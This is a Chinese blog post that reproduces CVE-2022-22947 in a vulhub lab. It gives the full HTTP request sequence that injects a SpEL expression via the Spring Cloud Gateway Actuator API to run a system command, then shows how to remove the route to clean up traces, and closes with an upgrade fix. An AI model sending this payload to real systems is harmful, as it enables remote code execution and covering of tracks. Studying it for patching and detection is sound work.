Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

最新推荐文章于 2024-07-05 15:06:33 发布
最新推荐文章于 2024-07-05 15:06:33 发布
阅读量5k 收藏 2
点赞数 2
分类专栏: WEB 漏洞复现和分析 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/123314194
版权

0x01

0x02 漏洞环境

推荐直接vulhub,干净卫生,兄弟们

vulhub/spring/CVE-2022-22947 at master · vulhub/vulhub (github.com)

docker-compose up -d

服务启动后,访问http://your-ip:8080即可看到演示页面

image-20220306171449209

0x03 漏洞复现

利用这个漏洞需要分多步。

首先,发送如下数据包即可添加一个包含恶意SpEL表达式的路由:

(此处的payload是升级之后的 ,利用AddResponseHeader去达到回显)

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

image-20220306171657617

然后,发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image-20220306171745622

发送如下数据包即可查看执行结果:

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image-20220306171815840

0x04 痕迹处理

引用 panda

在这里提醒一下,在实际环境中,如果由于某种原因删除不起作用,有可能会导致刷新请求失败,那么就会有可能会导致站点出现问题,所以在实际测试的过程中,建议别乱搞,不然就要重启站点了。

最后,发送如下数据包清理现场,删除所添加的路由:

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

image-20220306172343041

再刷新下路由:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

再触发,路由已经没有了image-20220306172420483

0x05 修复

升级最新版

目前官方已发布修复版本修复了该漏洞

https://github.com/spring-cloud/spring-cloud-gateway/tags

god_Zeo
关注
专栏目录
Spring Cloud Gateway Actuator API SpEL 代码注入(CVE-2022-22947)漏洞复现
千寻的博客
03-30 2642
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞发现实验环境复现步骤第一步 发送以下请求第二步 刷新网关。第三步 发送以下请求以检索结果第四步 发送一个 DELETE 请求第五步 再次刷新网关第六步 补充第七步 关闭漏洞环境修复建议免责声明 漏洞名称 Spring Cloud Gateway Actuator API SpEL 代码注入 漏洞编号 CVE-2022-22947 漏洞描述 Spring Cloud Gateway 提供了一个库,用于在 Spring WebFlux 之上构建 API 网关
CVE-2022-22947 Spring Cloud Gateway SpEL 表达式注入 RCE漏洞复现
afei001
03-05 4843
当启用和暴露 Gateway Actuator 端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)
yang1234567898的博客
04-25 3359
概念: 什么是spring cloudSpring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易
[CVE-2022-22947]Spring Cloud Gateway Actuator API SpEL表达式注入命令执行
whoami
03-03 4775
一、背景 Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 二、漏洞分析 ShortcutConfigurable.java : static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory, String entryValu..
【网络安全】漏洞挖掘之Spring Cloud注入漏洞
最新发布
wlaq_juju的博客
07-05 1221
springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
漏洞复现----42、Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947)
七天
06-30 1240
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947)
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞复现
Tauil的博客
07-25 898
查看其路由规则,因为这是个靶场,所以肯定是允许你访问的,正经网站肯定是不会给你访问的,打开burpsuite进行放包,我们需要添加一个新的路由到网关,添加新的路由需要用。表达式,所以我们可以选择任一过滤器进行使用,这里使用过滤器。然后使用refresh刷新路由配置,refresh也需要用。,并且可以看到他已经成功执行了我们输入的命令whoami。查看到路由表配置,此时可以看到多出了我们新添加的路由路径。方式提交,而网关最终会将所有的请求交给过滤链表。进行处理,所以我们将待执行命令放到。...
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator APISpEL(Spring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...
Spring Cloud Gateway Actuator API SpEL代码注入
小白的博客
04-18 2460
CVE-2022-22947 Spring Cloud Gateway Actuator API SpEL代码注入 影响版本 Spring Cloud GateWay 3.0.0以下,3.1.0,3.0.0~3.0.6 漏洞描述 ​ Gateway是在Spring生态系统之上构建的API网关服务,基于Spring 5、Spring Boot 2和Project Reactor等技术。Gateway旨在提供-种简单而有效的方式来对API进行路由, 以及提供一些强大的过滤器功能, 例如: 熔断、限流、
SpringCloudGateway远程代码执行CVE-2022-22947
m0_57379855的博客
03-12 1518
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
CVE-2022-22947 SpringCloud Gateway 远程命令执行漏洞
dust_hk的博客
03-07 6547
CVE-2022-22947 SPRINGCLOUD GATEWAY SPEL RCE 摘要 Spring Cloud Gateway的商业产品是分布式API网关,用于路由HTTP请求并处理跨领域问题,如单点登录(SSO),速率限制,访问控制。借助Spring Cloud Gateway forKubernetes,运营商可以专注于管理和监控其目标环境中的API网关,而应用程序开发人员可以专注于API的公开方式,并应用适当的设计和跨领域问题。 在 3.1.1+ 和 3.0.7+ 之前的 spring clo
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE复现
问题很多的小明
03-03 1433
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE复现
Spring Cloud Gateway系列【14】Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947
记录知识、锤炼自我
03-13 6232
文章目录漏洞说明影响范围漏洞复现1. 搭建项目2. 注入恶意代码解决方案 漏洞说明 近日,VMware 官方发布安全公告,其中包含Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)。使用 Spring Cloud Gateway的应用如果对外暴露了 Gateway Actuator接口,则可能存在被CVE-2022-22947漏洞利用的风险,攻击者可通过利用此漏洞执行 SpEL 表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。 影响范围 Spring Cl
spring 命令执行 (CVE-2022-22947)
qq_40646572的博客
05-11 1115
并且存在headdump文件,使用java -jar JDumpSpider-1.1-SNAPSHOT-full.jar .\heapdump进行一波分析,没发现有用的信息。2、缓解措施:如果不需要Gateway actuator endpoint,可通过 management.endpoint.gateway.enabled: false 禁用它。在http://192.168.5.128:21849/actuator/gateway/routes/页面下,发现路由信息。添加spel语句,执行系统指令。
[Vulfocus解题系列]spring 命令执行CVE-2022-22947
00勇士王子的博客
06-03 1178
使用docker部署环境。
Spring Cloud Gateway 监控、多网关实例路由共享 | Spring Cloud 18
gmHappy
03-11 6004
ActuatorSpring Boot提供的用来对应用系统进行监控的功能模块,借助于Actuator开发者可以很方便地对应用系统某些监控指标进行查看、统计等。 Actuator的核心是端点Endpoint。 Endpoint可以让我们监视应用程序并与其交互。Spring Boot包含许多内置端点,并允许您添加自己的端点。 我们可以启用或禁用每个端点,启用或禁用端点控制是否创建端点并且其bean存在于应用程序上下文中。 要进行远程访问,还必须通过JMX或HTTP公开端点。大多数端点HTTP访问默认是关闭的。
Spring Cloud Gateway使用说明(7)-- actuator
xgw的专栏
08-16 9087
15. Actuator API /gatewayactuator端点允许监视Spring Cloud Gateway应用程序并与之交互。要进行远程访问,必须在应用程序属性中暴露HTTP或JMX 端口。 Example 72. application.properties management.endpoint.gateway.enabled=true # default value management.endpoints.web.exposure.include=gateway 15.1. 获取详细
spring系列】Spring Cloud Gateway Actuator
叁滴水 的博客
11-10 3932
Spring Cloud Gateway动态路由 使用Spring Cloud Gateway 需要注意的地方: ​ Spring Cloud Gateway是基于Spring Boot 2.x, Spring WebFlux和Project Reactor 构建的。因此,在使用Spring Cloud Gateway时,许多不熟悉的同步库(例如,Spring Data和Spring Secur...
SpringCloud Gateway CVE-2022-22947漏洞详解
"SpringCloud Gateway 漏洞分析 (CVE-2022-22947) 文档主要探讨了SpringCloud Gateway中的安全漏洞及其分析。文档提到了SpringCloud Gateway作为Spring提供的微服务框架的一部分,它在第一代zuul的基础上提供了更好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值